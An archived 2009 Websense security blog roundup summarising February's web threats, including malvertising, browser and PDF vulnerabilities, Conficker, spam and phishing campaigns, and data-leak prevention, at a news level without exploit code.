Websense.com / Security Labs / Blogs / This Month in the Threat Webscape

Archived Blog

This Month in the Threat Webscape

03.11.2009 - 6:30 PM

To view this post in PDF, click here.

Month of February 2009

This month brings us more malvertising incidents placed on reputable news sites where the threat lurks within the revolving third-party ad network. Also this month, a ton of major browser exploits (an IE exploit was reverse-engineered from Microsoft's patch), a severe Adobe PDF Acrobat/Reader zero-day (be careful when opening that PDF!), and just about a million other security incidents scattered across the globe, once again illustrating just how dangerous the 2.0-Web can be.

Major hits 

Popular computer magazine eWeek was discovered by Websense to serve a malicious fake anti-virus scanner to unsuspecting visitors, although, through no fault of its own. The malicious Web site made its way to the end-user's machine through Google/DoubleClick's ad network. Google hasacknowledged the existence of the malvertising scourge on its ad network. Websense alerted officials at eWeek who worked with Google to rectify the situation immediately.

Malvertising is certainly not new, but is quietly growing more prevalent. Cleveland.com visitors were also hit by a malvertising campaign (via tacoda.net) that is reported to be similar to yet another malvertising campaign on AllRecipes.com that took place a few months ago.

Auctiva, an eBay solutions provider had its servers compromised and served malware to its own users through the browser. According to their VP of Engineering, "The virus malware was injected via a third third-party plug-in. Once in the file directory, the virus malware executed a malicious script that gained access to files. Once access was gained, the perpetrators used that access to place a low-level malicious script into files that were distributed to some of our users." You can read about the blow-by-blow ordeal for its users in more detail here.  

Web 2 dot uh-oh 

Spammers and malware authors using a unified strategy, once again executed their tactics in the Web 2.0 space, constantly switching among them, with an emphasis on improving their underground economy, as illustrated by the Twitter, Facebook and Orkut based attacks. The entire spammer and malware ecosystem was also clearly seen when spammers ramped up their siege of Digg. 

Bypassing in-place authentication systems continues to offer spammers and malware authors the opportunity to create and register fake accounts to carry out a wide range of visual social engineering attacks with increased success rates over a trusted user base where the content is easily editable, mixed-and-matched, and easily distributed and syndicated – Web 2.0's key selling points. 

Furthermore, compromised accounts were also used to successfully promote the fake accounts designed to act as doorway pages to malicious and spam domains, instances of which were also seen on Plaxo and Microsoft Office Live Small Business. The technique was also evident in the continuing attack on Digg.

Browsing for dirt 
 
How does one go about finding vulnerabilities in software?
 
You could spend time learning how to properly "QA" the software (if you have the source code), or reverse-engineer it, applying the usual black hat hacker bag of tricks to find holes, which, unless the hole is somewhat obvious, may be akin to finding a needle in a haystack.

However, there is a shortcut that is popular among Microsoft malware authors. One need only wait for the next second Tuesday of the month, download the security updates provided Microsoft, and reverse-engineer the software update to pin-point the exact location of the patch because that's exactly where the vulnerability is!

Internet Explorer

The trick of reverse-engineering Microsoft's security updates is not new, and is exactly what happened in the latest IE 7 attacks (MS09-002, CVE-2009-0075). Just a few days after the official Windows updates were announced, black hat hackers crafted exploits targeting the same vulnerability the security update was supposed to fix.

But wait, if the patch is out, aren't we all protected? Unfortunately, it's not that simple. Many people are slow to patch, especially large corporations because their IT departments sometimes delay distribution so they can verify that the patch does not break existing software. We call this the "window of exposure". During this window of exposure, if you visit a malicious Web site targeting this vulnerability, your computer would be infected. It doesn't matter if you are patched after you are infected, because you've already been infected (duh!)

In this particular attack on a vulnerability in IE 7, a malicious Microsoft Word document with an ActiveX control was used. 
 
Firefox

Firefox reported 1 critical, 2 high, and 1 moderate impact vulnerabilities patched in the latest Firefox update:

MFSA 2009-06 Directives to not cache pages ignored
MFSA 2009-05 XMLHttpRequest allows reading HTTPOnly cookies
MFSA 2009-04 (Impact: Moderate) Chrome privilege escalation via local .desktop files
MFSA 2009-03 (Impact: High) Local file stealing with SessionStore
MFSA 2009-02 (Impact: High) XSS using a chrome XBL method and window.eval
MFSA 2009-01 (Impact: Critical) Crashes with evidence of memory corruption (rv:1.9.0.6)

Safari

In last month's edition of our This Month in the Threat Webscape series, we mentioned the discovery of a flaw in Safari by Brian Mastenbrook (CVE-2009-0137 Accessing a maliciously crafted feed: URL may lead to arbitrary code execution). Apple has now patched this vulnerability, along with aslew of other vulnerabilities in various Apple products. 

Please note that this vulnerability in Safari is present even when installed on Windows

RIM BlackBerry

A quick note for corporate Crackberry addicts: RIM announced a security vulnerability in the BlackBerry Web Application Loader. By surfing to a malicious Web site, the attacker can run their code of choice on the handheld device. The US-CERT report is here.

Acrobat show FAIL

This month the Shadowserver Foundation reported an active Adobe Acrobat/Reader zero-day exploit in the wild. Opening a malicious PDF file quickly compromised the computer (a Backdoor.Trojan is downloaded and installed). Adobe's Product Security Incident Response Team (PSIRT) confirmed the zero-day and promised a fix by March 11, 2009. The post was dated February 19, 2009. That's a 20 day window-of-exposure. Wow.

Some have suggested disabling JavaScript in Acrobat Reader, but it is not an air-tight solution. Read our technical analysis of this malicious PDF here (CVE-2009-0658, APSA09-01).

In other Adobe Web product problems, Adobe Flash player was patched (APSB09-01). A Web visitor who points his or her browser to a Web site with a maliciously crafted Flash file, allows the attacker control of their computer, and the malcode executes with the permissions of the logged in user

Now, let's not forget that Adobe Flash has an almost 100% Flash penetration worldwide ;) Ouch!

Microsoft 

February's Patch Tuesday included patches for server applications and client side applications, one of which was MS09-002. Exploit code targeting the CVE-2009-0075 (MS09-002) vulnerability within Internet Explorer 7 was discovered in the wild. Our ThreatSeeker Network has been keeping an eye on numerous domains that are hosting active exploit code. Our ThreatSeeker Network is also protecting against zero-day code targeting Microsoft Excel (CVE-2009-0238 ). A specially crafted Excel file must be run by the user before further malicious files are dropped onto the user's machine. Websense is protecting our customers through our hosted and on-site email security offerings. No patch currently exists for this vulnerability.

Conficker/Downadup

On another front, Microsoft is still dealing with the Conficker/Downadup worm threat. The company has recently assembled a dedicated group from different parts of the IT industry to actively combat the worm outbreak. And they are not relying solely on technical solutions. Microsoft has announced a $250,000 reward for any information leading to the authors of the worm. One provocative observation is that many or most of the machines that have been compromised by the worm may have pirated copies of MS Windows installed, as the countries having the highest software piracy rate are, in fact, the most heavily hit by the worm. The Conficker/Downadup worm has already passed the 10,000,000 infected hosts milestone, and is getting a lot of attention from the media. The worm also introduces some nice technical tricks as it evolves, which has researchers keeping a close eye on it.

How live is your journal? 



The buzz on the Internet is clearly Web 2.0, and while Web 2.0 is justifiably big news, we must not forget the issues created by blogging way back in Web 1.5 days. 

Analysis of current blogging patterns shows that traditional blogging is alive and well. The graph above shows the last posting date for blogs on BlogSpot and LiveJournal. Both blogging engines show 45% of blogs have already posted an entry this year. Given that we are only 2 months into the year, it is safe to assume that these blogs are active. Blogs that haven't had a post since 2008 are either dormant or belong to infrequent bloggers. And blogs that haven't had a post since 2006 or 2007, are considered no longer active. When these statistic are combined with the fact that Websense has discovered in excess of 20 million blogging sites, it is clear that there's a massive amount of volatile, blog-based content.

Fast forward to the Web 2.0 space, and we find that social networking has redefined content sharing on the public Internet. Traditional blogging assumes that we want to share our thoughts with the entire world and that the world could (might) listen. Social networking has changed the game with a "friends only" viewing model. Studies of BlogSpot show that only approximately 2% of bloggers restrict their blogs to invitation only. For active blogs it is requirement to have real-time content-based analysis to get accurate classification.

Hello ThreatSeeker. You've got mail! 

Spammers' efforts to reach their prospective customers continue today with increased creativity and complexity. The long-term battle between service providers and spammers continues with spammers succeeding by consistently adapting to the improvements made to combat their activities. This was evident when spammers once again successfully broke Microsoft’s revolutionized CAPTCHA

On another front, spammers' objectives of increasing the overall time a spam campaign survives and making the campaign increasingly difficult to trace back to its origins, continued with Waledac’s Valentine's Day theme. To this end, they use randomized, complex networks – a fast-flux infrastructure, through which they kept advertising their malicious spam campaigns. 

Visual social engineering tactics are also being consistently adapted by spammers to increase the success of their attacks, which was evident inSkype Valentine spam lure, Walmart fake survey emails, and spam campaigns with malicious zip attachments that appeared to be using spoofed forward technique.

So long and thanks for all the phish 

Increasingly frustrated and desperate phishers are targeting GTalk and Gmail accounts. The attack aims to steal Google usernames and passwords, however unlike previous long-tail-phishing attacks, this one has strong monetary ties, as Google credentials can be used in Google Checkout and Google Adsense. The victim receives a GTalk IM with a TinyURL link that redirects to a ViddyHo login page.

 

Researchers from Harvard and Cambridge estimate that 75.8% of phishing sites are hosted on compromised servers. It is possible that phishers have obtained access to such servers using Google Hacking techniques. The efficacy of such techniques is notable given the fact that most of SQL injection attacks in 2008 performed automatic search engine reconnaissance.

 

As the deadline for taxpayers moves closer, phishers are sending more IRS phish. This time, the attack asks the victim to download and submit astimulus payment form.

 

The ThreatSeeker Network also discovered numerous newly-registered fake securities websites in China. These phishing sites host false information about stock and negotiable securities under the names of some of the big securities Web sites. They attempt to deceive people into paying for information or registering for their stock analysis service. 

Data Leakage Prevention

Perfect Storm: Leaky Apps, More Electronic Records

 

Call it a perfect storm, or a train wreck – whatever you like. But the writing is on the wall. Web 2.0 and other technologies are adding any number and type of applications to our internetworked soup, creating not only more avenues for communication, but also opening up opportunities for deliberate or inadvertent data leaks. On top of that, we’re seeing large-scale trends to digitize traditionally hard copy data to improve automation, but making data leaks and theft more likely, because it’s ‘just in a file’ and can be accessed from virtually anywhere.

 

News broke on Monday that detailed blueprints were leaked from a government contractor laptop on which P2P file sharing software was installed. The data was pilfered by a hacker who monitors these P2P networks. But safeguards could have been in place above and beyond the public P2P monitoring service from Tiversa that initially discovered the breach. In short, fingerprints of sensitive data followed by regular discovery of this sensitive data across servers and employee and contractor laptops would have kept a current inventory of where all the data (e.g. blueprints or *portions* thereof) lives, enabling investigators to determine where the leak originated (after the fact) and enabling IT administrators to determine which systems need to be further secured (before the fact). To catch the leak, real-time monitoring of communications channels at the endpoint (data in use) and on the network (data in motion) would catch the use of P2P or other applications to transmit this data.

 

Shoulda, woulda, coulda.

 

But this wasn’t the only newsworthy item to us. There was a small but significant ‘nudge’ in the multi-digit, no-such-thing-as-a-free-lunch stimulus program. Continuing the directive from the previous 2004 Bush administration, the new Obama administration has supported a $21M infusion to establish e-health records for most Americans by 2014. Yes, that’s only five years away. And with today’s population estimated at 305,940,982 and projected to grow to 309,753,000 (PDF), we’re talking about at least that many records - accounting for per patient, multiple records, multiple doctors and even correcting for the (sad to say) uninsured. This all becomes significant with the existing HIPAA regulations in place to protect PHI – Personal Health Information – including diagnosis codes, prescription information, pre-existing conditions, etc. Protecting the privacy of patients requires the same type of technology required to protect sensitive business data such as POTUS’ helicopter blueprints. Identifying HIPAA data with templates for PHI data and monitoring communications on a broad scale can limit the risk of a HIPAA violation and prevent fines or lawsuits by patient victims.

 

So can we possibly keep tabs on these new channels for communication, and therefore data leaks, while securing our most precious data, including those addressing matters of national security? And can we keep up with the growing volume of electronic health records, containing PHI and therefore requiring HIPAA compliance?

 

Yes we can!


Security Trends 

Like all things shiny and fast-growing in Web 2.0, Twitter has attracted a ton of unwanted attention from modern-day cyber-criminals. This month, ZDNet reports on a commercial spamming tool called Tweet Tornado. This dodgy tool does just what it sounds like it would do – creates massive amounts of Twitter accounts automatically and bombards other Twitter users with messages (most likely not the kind you like).

CanSecWest's Pwn2Own (a white hat hacking contest) has just announced that this year's contest will be focused on 2 sets of technologies: web browsers and mobile devices. Good call, because that's where attacks are now taking place - over the web. As mobile applications become more tethered to the Web, or more 'iPhone-class' as Walt Mossberg would put it, smart cyber criminals looking ahead are beginning to recognize this adjacent Blue Ocean as a plausible target market to steal more valuable information and increase the size of their botnets.


Thanks to the following contributors for this month's roundup:

  • Gargi Mitra (Data Loss Prevention)
  • Mark Haffenden (Advanced Content Research)
  • Sumeet Prasad (Security & Technology Research)
  • Saeed Abu-Nimeh (Security & Technology Research)
  • Carl Leonard (Security & Technology Research) 
  • Elad Sharf (Security & Technology Research) 
  • Jay Liew (Security & Technology Research) 
Bookmark This Post: